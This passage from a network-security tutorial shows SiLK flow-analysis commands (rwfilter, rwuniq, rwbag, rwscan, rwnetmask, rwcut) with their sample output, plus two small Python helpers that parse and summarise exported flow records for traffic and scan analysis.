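2019/05/02T16:30:15|   172.16.10.13|    13.107.5.88| SRPA | S      |    0|       1|
2019/05/02T16:30:45|   172.16.10.13| 157.55.135.128|FS PA | S      |   19|       1|
2019/05/02T16:30:15|   13.107.3.128|   172.16.10.13| S A  | S A    |    0|       1|
2019/05/02T16:30:45| 157.55.135.128|   172.16.10.13|FSRPA | S A    |   19|       1|
"""

if __name__ == "__main__":
    for flow in parse_rwuniq(SAMPLE):
        print(f"{flow.sip:>15} -> {flow.dip:<15} {classify(flow)}")
    print(summarize(SAMPLE))
```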
</div><div><br /></div><div>Look at the last 5 sessions again, this time adding the duration field to <b><i>rwuniq</i></b> and flows, bytes and packets to the <i>--values</i>.</div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2019/04/01T0 --end-date=2022/05/01 --protocol=6 --pass-destination=stdout --dport=22,80,443,4444 --flags-all=SAFP/FSRPA --max-pass=5 | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwuniq --fields stime,sIP,dIP,dport,flags,type,duration --values=flows,bytes,packets</span></b></span>
<span style="color: white;"> sTime| sIP| dIP|dPort| flags| type|durat| Records| Bytes| Packets|</span>
<span style="color: white;">2019/05/02T16:38:32| 172.16.10.13| 192.96.162.33| 80|FS PA | outweb| 78| 2| 977| 14|</span>
<span style="color: white;">2019/05/02T16:38:32| 172.16.10.13| 23.33.106.133| 80|FS PA | outweb| 78| 1| 505| 7|</span>
<span style="color: white;">2019/05/02T16:30:45| 172.16.10.13| 157.55.135.128| 443|FS PA | outweb| 19| 1| 6297| 16|</span>
<span style="color: white;">2019/05/02T16:38:30| 172.16.10.13| 192.96.162.110| 80|FS PA | outweb| 108| 1| 575| 7|</span>
</pre></td></tr></tbody></table></div>
<br />Leveraging <b><i>rwbag</i></b>. Preparing the data via <b><i>rwfilter</i></b>, then piping it to <b><i>rwbag</i></b>, which here keys on the source IPv4 address and sums the bytes (<i>--bag-file=sipv4,sum-bytes,/tmp/test.bag</i>).<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2019/04/01T0 --end-date=2022/05/01 --protocol=6 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--pass-destination=stdout --dport=22,80,443,4444 --max</span></b></span><b><span style="color: #fcff01;"><span>-pass=5 | \</span></span></b></pre><pre style="line-height: 125%; margin: 0px;"><b><span style="color: #fcff01;"><span>rwbag --bag-file=sipv4,sum-bytes,/tmp/test.bag</span></span></b>
</pre></td></tr></tbody></table></div>
<br />Viewing the contents of the bag created via <i><b>rwbag</b></i> with <i><b>rwbagcat</b></i>: each line is a source IP and its summed byte count.<br /><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwbagcat test.bag</span></b></span>
<span style="color: white;"> 172.16.10.13| 8106|</span>
<span style="color: white;"> 172.16.40.12| 80|</span>
</pre></td></tr></tbody></table></div>
</div><div><br />Leveraging <b><i>rwscan </i></b>to identify potential scanning IPs. <b><i>rwscan</i></b> requires its input sorted by source IP, protocol and destination IP, hence the <b><i>rwsort</i></b> stage. <i>--scan-model=2</i> selects the Bayesian Logistic Regression model only; the default, 0, combines it with the Threshold Random Walk model, and 1 uses TRW only.</div><div><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/05/01 --protocol=6 --pass-destination=stdout | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwsort --fields sip,protocol,dip | rwscan --scan-model=2</span></b></span>
<span style="color: white;"> sip| proto| stime| etime| flows| packets| bytes|</span>
<span style="color: white;"> 10.200.223.2| 6| 2022-03-07 11:59:46| 2022-04-30 23:49:43| 1061401| 57208212|3107887558|</span>
<span style="color: white;"> 10.200.223.3| 6| 2022-02-09 12:51:11| 2022-04-30 16:36:16| 413308| 10588224| 583916721|</span>
<span style="color: white;"> 10.200.223.4| 6| 2022-02-08 14:26:13| 2022-04-30 00:14:41| 3749647| 65736155|4056928153|</span>
<span style="color: white;"> 10.200.223.5| 6| 2022-02-11 20:55:22| 2022-04-30 15:11:11| 2776970| 7508499| 406143689|</span>
<span style="color: white;"> 10.200.223.7| 6| 2022-02-08 15:50:32| 2022-03-24 22:18:35| 149108| 4259383| 241338192|</span>
<span style="color: white;"> 10.200.223.8| 6| 2022-02-11 21:06:29| 2022-04-30 03:01:23| 232009| 3673446| 177412489|</span>
<span style="color: white;"> 172.28.20.3| 6| 2022-02-18 16:23:53| 2022-04-30 23:15:50| 299| 1430| 181320|</span>
<span style="color: white;"> 172.28.20.4| 6| 2022-02-24 18:32:19| 2022-04-29 23:05:43| 224| 1207| 170436|</span>
<span style="color: white;"> 172.28.20.6| 6| 2022-02-16 16:05:19| 2022-04-21 01:39:55| 8202| 24551| 1342732|</span>
<span style="color: white;"> 172.28.30.2| 6| 2022-02-16 16:26:12| 2022-04-26 16:05:56| 544| 2724| 351448|</span>
<span style="color: white;"> 172.28.30.3| 6| 2022-02-10 17:42:20| 2022-03-19 18:53:36| 168| 497| 25844|</span>
<span style="color: white;"> 172.28.30.4| 6| 2022-02-08 20:47:57| 2022-04-28 16:56:30| 525| 2626| 350572|</span>
<span style="color: white;"> 172.28.30.5| 6| 2022-02-10 18:05:52| 2022-04-30 15:16:06| 446| 2428| 334660|</span>
<span style="color: white;"> 172.28.50.2| 6| 2022-02-10 18:41:21| 2022-04-29 15:55:32| 580| 2883| 367628|</span>
</pre></td></tr></tbody></table></div>
<br />Narrowing the above down to just the source IP and its flow count, ready to be stored in a bag. First get the data via <b><i>rwfilter</i></b>, <b><i>rwsort </i></b>and <b><i>rwscan</i></b>, then pipe it into <i>cut</i> to keep fields 1 (sIP) and 5 (flows). <i>--no-title</i> drops the header line so that only data reaches the next stage.<p></p></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/05/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=6 --pass-destination=stdout | rwsort --fields sip,protocol,dip | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwscan --scan-model=2 --no-title --output-path=stdout | cut --fields=1,5 --delimiter='|'</span></b></span>
<span style="color: white;"> 10.200.223.2| 1061401</span>
<span style="color: white;"> 10.200.223.3| 413308</span>
<span style="color: white;"> 10.200.223.4| 3749647</span>
<span style="color: white;"> 10.200.223.5| 2776970</span>
<span style="color: white;"> 10.200.223.7| 149108</span>
<span style="color: white;"> 10.200.223.8| 232009</span>
<span style="color: white;"> 172.28.20.3| 299</span>
<span style="color: white;"> 172.28.20.4| 224</span>
<span style="color: white;"> 172.28.20.6| 8202</span>
<span style="color: white;"> 172.28.30.2| 544</span>
<span style="color: white;"> 172.28.30.3| 168</span>
<span style="color: white;"> 172.28.30.4| 525</span>
<span style="color: white;"> 172.28.30.5| 446</span>
<span style="color: white;"> 172.28.50.2| 580</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Create the bag consisting of the IPs shown above. Read directly from <b><i>rwfilter</i></b>, pipe into <b><i>rwsort</i></b>, then <b><i>rwscan</i></b>, then <i>cut</i>, then <b><i>rwbagbuild</i></b>, which accepts <i>key|counter</i> text on stdin (<i>--bag-input=stdin</i>) and interprets the key as a source IPv4 address (<i>--key-type=sipv4</i>). After building the bag, use <b><i>rwbagcat </i></b>to view the records.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/05/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=6 --pass-destination=stdout | rwsort --fields sip,protocol,dip | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwscan --scan-model=2 --no-title --output-path=stdout | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">cut --fields=1,5 --delimiter='|' | rwbagbuild --bag-input=stdin --key-type=sipv4 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--counter-type=records | rwbagcat</span></b></span>
<span style="color: white;"> 10.200.223.2| 1061401|</span>
<span style="color: white;"> 10.200.223.3| 413308|</span>
<span style="color: white;"> 10.200.223.4| 3749647|</span>
<span style="color: white;"> 10.200.223.5| 2776970|</span>
<span style="color: white;"> 10.200.223.7| 149108|</span>
<span style="color: white;"> 10.200.223.8| 232009|</span>
<span style="color: white;"> 172.28.20.3| 299|</span>
<span style="color: white;"> 172.28.20.4| 224|</span>
<span style="color: white;"> 172.28.20.6| 8202|</span>
<span style="color: white;"> 172.28.30.2| 544|</span>
<span style="color: white;"> 172.28.30.3| 168|</span>
<span style="color: white;"> 172.28.30.4| 525|</span>
<span style="color: white;"> 172.28.30.5| 446|</span>
<span style="color: white;"> 172.28.50.2| 580|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Alternatively, bin the IPs by their counter value. Notice <i>--bin-ips </i>to <b><i>rwbagcat</i></b>: instead of one line per key, it prints one line per counter value together with the number of IPs that share it. Here <i>cut</i> keeps only the IP column and <i>sort --unique</i> removes duplicates, so <b><i>rwbagbuild</i></b> assigns every IP its default counter of 1, and the output reports that 14 IPs have a count of 1.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/01/01T0 --end-date=2022/05/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=6 --pass-destination=stdout | rwsort --fields sip,protocol,dip | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwscan --scan-model=2 --no-title --output-path=stdout | cut --fields=1 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--delimiter='|' | sort --unique | rwbagbuild --bag-input=stdin --key-type=sipv4 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--counter-type=records | rwbagcat --bin-ips</span></b></span>
<span style="color: white;"> 1| 14|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><br /></div><div>Introducing <b><i>rwnetmask</i></b>. Maybe you have a network where communication looks like this.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/04/01T0 --end-date=2022/05/01 --protocol=6 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--pass-destination=stdout --max-pass=5 | rwuniq --fields sip,dip</span></b></span>
<span style="color: white;"> sIP| dIP| Records|</span>
<span style="color: white;"> 52.167.17.97| 172.28.20.4| 1|</span>
<span style="color: white;"> 20.72.205.209| 172.28.30.3| 1|</span>
<span style="color: white;"> 52.109.88.35| 172.28.30.4| 1|</span>
<span style="color: white;"> 52.167.17.97| 172.28.30.4| 1|</span>
<span style="color: white;"> 20.72.205.209| 172.28.10.10| 1|</span>
</pre></td></tr></tbody></table></div>
</div><div>Rather than the full IP address, you would like only the /24 network each address belongs to. <b><i>rwnetmask</i></b> keeps the first 24 bits of the source and destination addresses and zeroes the host bits, so the same records now show up as /24 networks.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --start-date=2022/04/01T0 --end-date=2022/05/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--protocol=6 --pass-destination=stdout --max-pass=5 | rwnetmask \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--4sip-prefix-length=24 --4dip-prefix-length=24 | rwcut --fields sip,dip</span></b></span>
<span style="color: white;"> sIP| dIP|</span>
<span style="color: white;"> 52.167.17.0| 172.28.20.0|</span>
<span style="color: white;"> 52.167.17.0| 172.28.30.0|</span>
<span style="color: white;"> 20.72.205.0| 172.28.10.0|</span>
<span style="color: white;"> 52.109.88.0| 172.28.30.0|</span>
<span style="color: white;"> 20.72.205.0| 172.28.30.0|</span>
</pre></td></tr></tbody></table></div>
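<div><br /></div><div>The two ideas just shown, masking addresses to a prefix with <b><i>rwnetmask</i></b>, and summing a counter per key into a bag with <b><i>rwbag</i></b>/<b><i>rwbagbuild</i></b> and then binning it with <b><i>rwbagcat --bin-ips</i></b>, are easy to reproduce on exported text when SiLK is not installed on the analysis host. The following is an added example written for this post; it is not SiLK code and not part of the original post. The flow lines are constructed in the shape of <i>rwcut --no-columns</i> output, and the function names <i>parse_rwcut</i>, <i>netmask</i>, <i>build_bag</i> and <i>bin_ips</i> are my own.</div><div><br /></div>

```python
"""Added example (not from the original post, not SiLK code): reproduce the
rwnetmask -> rwbag -> rwbagcat --bin-ips pipeline in plain Python over
rwcut-style pipe-delimited text."""
import ipaddress
from collections import Counter

# Constructed sample in the shape of
# `rwcut --fields sip,dip,dport,bytes --no-columns` output.
# The addresses and byte counts are made up for this example.
SAMPLE_FLOWS = """\
sIP|dIP|dPort|bytes|
52.167.17.97|172.28.20.4|443|1200|
52.167.17.98|172.28.30.4|443|800|
20.72.205.209|172.28.30.3|22|4000|
20.72.205.210|172.28.10.10|22|6000|
52.109.88.35|172.28.30.4|80|2000|
"""


def parse_rwcut(text):
    """Turn rwcut --no-columns output into a list of dicts keyed by header name."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = [h.strip() for h in lines[0].rstrip("|").split("|")]
    records = []
    for line in lines[1:]:
        fields = [f.strip() for f in line.rstrip("|").split("|")]
        records.append(dict(zip(header, fields)))
    return records


def netmask(ip, prefix_len):
    """What rwnetmask --4sip-prefix-length=N does to one address:
    keep the first N bits and zero the host bits."""
    net = ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False)
    return str(net.network_address)


def build_bag(records, key_field, counter_field=None, prefix_len=32):
    """Equivalent of rwbag --bag-file=sipv4,sum-<counter>: sum counter_field
    per (masked) key. counter_field=None counts records instead, which is
    what the rwbagbuild --counter-type=records bag on the page holds."""
    bag = Counter()
    for rec in records:
        key = netmask(rec[key_field], prefix_len)
        bag[key] += 1 if counter_field is None else int(rec[counter_field])
    return dict(bag)


def bin_ips(bag):
    """Equivalent of rwbagcat --bin-ips: for each counter value, how many keys have it."""
    return dict(Counter(bag.values()))


if __name__ == "__main__":
    flows = parse_rwcut(SAMPLE_FLOWS)
    by_src_24 = build_bag(flows, "sIP", "bytes", prefix_len=24)
    for key, total in sorted(by_src_24.items()):
        print(f"{key:>16}|{total:>12}|")   # same shape as rwbagcat output
    print(bin_ips(by_src_24))
```

<div>Running it prints the byte totals per source /24 and then the bin histogram, in which two networks share the same total. Masking the destination side, as the page does with <i>--4dip-prefix-length</i>, is the same call with <i>"dIP"</i> as the key field; <i>prefix_len=32</i> leaves the addresses untouched, which is the plain <b><i>rwbag</i></b> behaviour.</div>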
</div><div>Find the busiest well-known TCP ports (<i>--dport=0-1023</i>) on the network via <b><i>rwfilter </i></b>and <b><i>rwuniq</i></b>. Note that <i>--max-pass=1000</i> stops <b><i>rwfilter</i></b> after the first 1000 matching records, so the counts below describe that sample rather than the whole date range.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --protocol=6 --dport=0-1023 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--start-date=2022/01/01 --end-date=2022/05/01 --pass=stdout --max-pass=1000 | \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">rwuniq --fields dport --values flow,bytes,packets --sort</span></b></span>
<span style="color: white;">dPort| Records| Bytes| Packets|</span>
<span style="color: white;"> 21| 1| 156| 3|</span>
<span style="color: white;"> 22| 39| 248109713| 4847875|</span>
<span style="color: white;"> 25| 17| 1047287| 809|</span>
<span style="color: white;"> 80| 4| 6315| 104|</span>
<span style="color: white;"> 443| 939| 912196| 20670|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Add the type and sensor fields for more detail on the direction of the traffic (in, out, inweb) and the sensor that recorded it.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7
8</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwfilter --protocol=6 --dport=0-1023 --start-date=2022/01/01 \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--end-date=2022/05/01 --pass=stdout --max-pass=1000 | rwuniq \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span><b><span style="color: #fcff01;">--fields dport,type,sensor --values flow,bytes,packets --sort</span></b></span>
<span style="color: white;">dPort| type| sensor| Records| Bytes| Packets|</span>
<span style="color: white;"> 21| in| Internal| 1| 156| 3|</span>
<span style="color: white;"> 22| in| Internal| 33| 247919188| 4845368|</span>
<span style="color: white;"> 22| out| Internal| 6| 190525| 2507|</span>
<span style="color: white;"> 25| in| Internal| 17| 1047287| 809|</span>
<span style="color: white;"> 80| inweb| Internal| 4| 6315| 104|</span>
<span style="color: white;"> 443| inweb| Internal| 939| 912196| 20670|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div><br /></div><div>I find it quite interesting that, although most of the flow records go to port 443, the overwhelming majority of the bytes and packets go to port 22, typically associated with SSH.</div><div><br /></div><div>So far I've been specific about fields such as<i> --fields=sip</i>. How about grabbing all the fields with <b><i>rwcut</i></b> <i>--all-fields</i>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sans@sec503:~/nik$ <b>rwcut --all-fields attack-trace.rw --num-recs=2</b></span>
<span style="color: white;"> sIP| dIP|sPort|dPort|pro| packets| bytes| flags| sTime| duration| eTime| sensor| in| out| nhIP|initialF|sessionF|attribut|appli|cla| type| sTime+msec| eTime+msec| dur+msec|iTy|iCo|</span>
<span style="color: white;"> 98.114.205.102| 192.150.11.111| 1821| 445| 6| 4| 168|FS A |2019/04/20T03:28:28.374| 0.354|2019/04/20T03:28:28.728| Internal| 0| 0| 0.0.0.0| S |F A | | 0|all| in|2019/04/20T03:28:28.374|2019/04/20T03:28:28.728| 0.354| | |</span>
<span style="color: white;"> 192.150.11.111| 98.114.205.102| 445| 1821| 6| 3| 128|FS A |2019/04/20T03:28:28.375| 0.353|2019/04/20T03:28:28.728| Internal| 0| 0| 0.0.0.0| S A |F A | | 0|all| in|2019/04/20T03:28:28.375|2019/04/20T03:28:28.728| 0.353| | |</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Revisit the timestamps via <b><i>rwcut</i></b>.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut --fields stime attack-trace.rw --num-recs=5</span></b></span>
<span style="color: white;"> sTime|</span>
<span style="color: white;">2019/04/20T03:28:28.374|</span>
<span style="color: white;">2019/04/20T03:28:28.375|</span>
<span style="color: white;">2019/04/20T03:28:28.509|</span>
<span style="color: white;">2019/04/20T03:28:28.509|</span>
<span style="color: white;">2019/04/20T03:28:30.466|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Use the legacy timestamp instead with <b><i>rwcut</i></b>, rather than the default.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut --fields stime attack-trace.rw --legacy-timestamp --num-recs=5</span></b></span>
<span style="color: white;"> sTime|</span>
<span style="color: white;">04/20/2019 03:28:28|</span>
<span style="color: white;">04/20/2019 03:28:28|</span>
<span style="color: white;">04/20/2019 03:28:28|</span>
<span style="color: white;">04/20/2019 03:28:28|</span>
<span style="color: white;">04/20/2019 03:28:30|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Or produce the time as epoch seconds. Here it is <b><i>rwuniq</i></b> rather than <b><i>rwcut</i></b> doing the formatting: <i>--bin-time=86400</i> rounds each start time down to a one-day bin, and <i>--timestamp-format=epoch</i> prints that bin as seconds since 1970-01-01.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~$ </span><b><span style="color: #fcff01;">rwfilter --start=2022/01/05T0 --end=2022/07/01 --protocol=0- \</span></b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--pass=stdout --type=all --bytes=0-30 | rwuniq --bin-time=86400 --fields stime,type \</b></span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: #fcff01;"><b>--values=records --sort-output --timestamp-format=epoch | head --lines=5</b></span>
<span style="color: white;"> sTime| type| Records|</span>
<span style="color: white;">1644624000| in| 4136|</span>
<span style="color: white;">1644624000| out| 52|</span>
<span style="color: white;">1644710400| in| 2469|</span>
<span style="color: white;">1644796800| in| 4307|</span>
</pre></td></tr></tbody></table></div>
</div><div><br /></div><div>Revisit <b><i>rwcut </i></b>formatting.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut --fields stime,duration,sip,dport attack-trace.rw --num-recs=5</span></b></span>
<span style="color: white;"> sTime| duration| sIP|dPort|</span>
<span style="color: white;">2019/04/20T03:28:28.374| 0.354| 98.114.205.102| 445|</span>
<span style="color: white;">2019/04/20T03:28:28.375| 0.353| 192.150.11.111| 1821|</span>
<span style="color: white;">2019/04/20T03:28:28.509| 4.938| 98.114.205.102| 445|</span>
<span style="color: white;">2019/04/20T03:28:28.509| 4.938| 192.150.11.111| 1828|</span>
<span style="color: white;">2019/04/20T03:28:30.466| 3.100| 98.114.205.102| 1957|</span>
</pre></td></tr></tbody></table></div>
<br />Remove the column alignment with <i>--no-columns</i>; the output is still pipe delimited, which is the form to feed into <i>cut</i>, <i>awk</i> or a script.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
2
3
4
5
6
7</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">rwcut --fields stime,duration,sip,dport attack-trace.rw --num-recs=5</span></b><span style="color: white;"> --no-columns</span></span>
<span style="color: white;">sTime|duration|sIP|dPort|</span>
<span style="color: white;">2019/04/20T03:28:28.374|0.354|98.114.205.102|445|</span>
<span style="color: white;">2019/04/20T03:28:28.375|0.353|192.150.11.111|1821|</span>
<span style="color: white;">2019/04/20T03:28:28.509|4.938|98.114.205.102|445|</span>
<span style="color: white;">2019/04/20T03:28:28.509|4.938|192.150.11.111|1828|</span>
<span style="color: white;">2019/04/20T03:28:30.466|3.100|98.114.205.102|1957|</span>
</pre></td></tr></tbody></table></div>
<br /> Revisit creating a file from <b><i>rwfilter</i></b>. This time, set the <i>--compression-method</i> to <i>none</i>. <i>--protocol=0-</i> matches every protocol and <i>--type=all</i> every flow type, so this is simply the first 100 records of the date range.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;">1
</pre></td></tr></tbody></table></div>
